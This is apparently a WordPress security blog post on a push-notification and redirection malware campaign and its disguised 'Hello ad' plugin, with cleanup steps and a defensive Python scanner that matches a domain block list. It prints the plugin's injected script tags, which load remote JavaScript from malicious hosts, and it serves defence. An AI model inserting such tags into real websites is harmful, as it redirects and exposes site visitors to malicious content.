How to Fix Push Notification & Redirection Malware on WordPress

Jun 3, 2020 | Security - Internet, WordPress, and otherwise




For the last couple of weeks, security researchers at Astra have been tracking push notification malware on WordPress. This campaign has been combined with the ongoing redirection campaign on WordPress websites.

A few malicious domains where redirection is happening include inpagepush[.]com, asoulrox[.]com, iclickcdn[.]com and justcannabis[.]online.

Hackers have gone a step further this time and made the campaign more sophisticated by installing a legitimate-looking ‘Hello ad’ plugin on infected WordPress websites. More on it below.

Symptoms of the Push Notifications Malware – WordPress

  1. Vulgar Push Notifications: Visitors are shown malicious/vulgar push notifications when visiting your website.

  2. Website Redirection: Visitors are redirected to malicious pages when they click links on your website (links which should go to pages within your WordPress site).

    A few URLs where your website might be redirecting to include inpagepush[.]com, asoulrox[.]com and iclickcdn[.]com.

  3. Unknown Plugins Found: In some cases we’ve found that a new malicious plugin named ‘Hello ad’ has been added to the WordPress site.
  4. Device Specific/Mobile Only Virus: We’ve noticed that this malware hides itself really well. It won’t always send the push notifications or redirect users. The behavior is device-specific.

    Sometimes the malware shows push notifications only on mobile devices and sometimes it only redirects new users, not someone who has already opened the website earlier.

Curious Case of Malicious Hello Ad Plugin

We’ve seen the ‘Hello ad’ plugin being added to these infected websites to redirect users to hacker-controlled websites.

This legitimate-looking plugin adds the following malicious JavaScript code to the page source:

<script>(function(s,u,z,p){s.src=u,s.setAttribute('data-zone',z),p.appendChild(s);})(document.createElement('script'),'https://iclickcdn.com/tag.min.js',3336627,document.body||document.documentElement)</script>
<script src="https://asoulrox.com/pfe/current/tag.min.js?z=3336643" data-cfasync="false" async></script>
<script type="text/javascript" src="//inpagepush.com/400/3336649" data-cfasync="false" async="async"></script>
Hello Ad plugin flagged by Astra Security’s malware scanner on an infected WordPress Website

The code added by this plugin plays an important role in making the redirection. However, we’ve seen hackers evolving and obfuscating this code with each new campaign.

How to fix the Push Notifications Malware, Hello Ad & Redirection Hack Campaign

  1. Check the obvious places: Hackers have a few favorite places where they insert the virus/malware code. When starting to fix your WordPress, it’s best you start with these. The following files should be looked at first:
    • index.php
    • wp-content/themes/{themeName}/functions.php
    • wp-config.php
    • Core theme files
    • .htaccess
  2. Find & remove the Hello ad plugin: If you find this ‘legitimate looking’ plugin and think that you or your developer might have installed it in the past – please uninstall it, as that’s not the case 🙂
  3. Removing Redirection: WordPress redirection attacks have been happening for months now. Taking care of malicious redirection hacks requires looking into the database tables, core theme files and sometimes your server’s configuration files too. Look for scripts/resources loaded from unknown URLs.

    Since redirection malware is so prevalent, we’ve made a detailed step-by-step video on fixing redirection hacks. Though hackers keep updating their methods to stay off the radar of security companies, the underlying principle is the same.
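
As a starting point for steps 1 and 3, the added example below (not Astra's code) walks a copy of the site files or an exported database dump and reports every quoted URL host that is not on your allow-list, marking the domains named in this article as known-bad. The allow-list argument, the file-extension list and the sample string are assumptions made for the example.

```python
import os
import re
from urllib.parse import urlparse

# Domains named in the article (defanged there); subdomains match too.
KNOWN_BAD = ("inpagepush.com", "asoulrox.com", "iclickcdn.com", "justcannabis.online")
EXTENSIONS = (".php", ".js", ".html", ".htaccess", ".sql")  # .sql: exported DB dump
# Quoted http(s):// or //host URLs: src attributes and loader string literals.
URL_RE = re.compile(r"""["']((?:https?:)?//[^"'\s<>\\]+)""", re.I)

def quoted_url_hosts(text):
    """Return the set of hosts of every quoted URL found in text."""
    hosts = set()
    for url in URL_RE.findall(text):
        try:
            host = urlparse("https:" + url if url.startswith("//") else url).hostname
        except ValueError:  # malformed authority such as an unbalanced "["
            continue
        if host:
            hosts.add(host)
    return hosts

def classify(host, allowed):
    """Known-bad is checked first so an allow-list entry cannot mask it."""
    def listed(domains):
        return any(host == d or host.endswith("." + d) for d in domains)
    if listed(KNOWN_BAD):
        return "known-bad"
    return "allowed" if listed(allowed) else "unknown"

def scan_tree(root, allowed):
    """Return sorted (relative path, host, verdict) for every host not allowed."""
    findings = []
    for dirpath, _dirs, names in os.walk(root):
        for name in (n for n in names if n.endswith(EXTENSIONS)):
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                hosts = quoted_url_hosts(fh.read())
            rel = os.path.relpath(path, root)
            findings += [(rel, h, v) for h in hosts
                         if (v := classify(h, allowed)) != "allowed"]
    return sorted(findings)

# Constructed sample: one tag from the article plus a made-up same-site script.
SAMPLE = ('<script src="//inpagepush.com/400/3336649" async="async"></script>'
          '<script src="https://example.com/wp-includes/js/a.js"></script>')
if __name__ == "__main__":
    for host in sorted(quoted_url_hosts(SAMPLE)):
        print(host, classify(host, ["example.com"]))
```

Run `scan_tree` against an offline copy of the site with your own domain and the third-party hosts you actually use as the allow-list; every "unknown" row is a resource to trace back to a plugin, theme or database row you recognise.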

Hackers are always evolving their methods, exploiting vulnerabilities not known to the world and combining various exploits to create a hack. While removing the hack is one part, ensuring one never gets hacked requires something more permanent – like Astra’s Security suite 🙂
